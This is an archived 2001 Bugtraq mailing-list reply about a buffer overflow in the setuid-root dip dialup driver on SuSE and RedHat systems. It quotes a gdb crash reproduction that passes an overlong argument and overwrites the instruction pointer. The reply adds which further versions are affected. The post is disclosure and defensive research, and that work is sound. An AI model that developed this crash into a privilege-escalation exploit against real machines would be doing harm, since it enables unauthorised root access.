[21564] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: dip 3.3.7p-overflow

daemon@ATHENA.MIT.EDU (Martijn A.)
Tue Jul 17 11:57:44 2001

From: "Martijn A." <ntr0nic@hotmail.com>
To: mmmad@siodemka.p.lodz.pl
Cc: bugtraq@securityfocus.com
Date: Tue, 17 Jul 2001 15:44:25 +0200
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F47zQUq9ZoQ21Y1B0y60001e188@hotmail.com>

>After doing a check on my SuSE linux 7.0 x86 i found >something 
>interesting:
>
>hegi@faust:~ > ls -la /usr/sbin/dip
>-rwsr-xr--   1 root     dialout     62056 Jul 29  2000 /usr/sbin/dip
>
>DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
>Written by Fred N. van Kempen, MicroWalt Corporation.
>
>(gdb) run -k -l `perl -e 'print "a" x 130 '`
>Starting program: /usr/sbin/dip -k -l `perl -e 'print "a" x 130 '`
>DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
>Written by Fred N. van Kempen, MicroWalt Corporation.
>
>DIP: cannot open /var/lock/LCK..aaaa......aaaaaaa: Datei oder >Verzeichnis 
>nicht gefunden
>
>Program received signal SIGSEGV, Segmentation fault.
>0x61616161 in ?? ()
>
>The same packet and problem is on SuSe 7.1 and RedHat 6.2. >I don't have 
>SuSe 7.2 to check.

SuSE 6.2 and 6.3 are also vulnerable and setuid root. But normal users, just 
like on SuSE 7.0, don't have execute permissions on these versions.

Regards,

Martijn A.

_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[21564] in bugtraq

Re: dip 3.3.7p-overflow

daemon@ATHENA.MIT.EDU (Martijn A.)Tue Jul 17 11:57:44 2001

daemon@ATHENA.MIT.EDU (Martijn A.)
Tue Jul 17 11:57:44 2001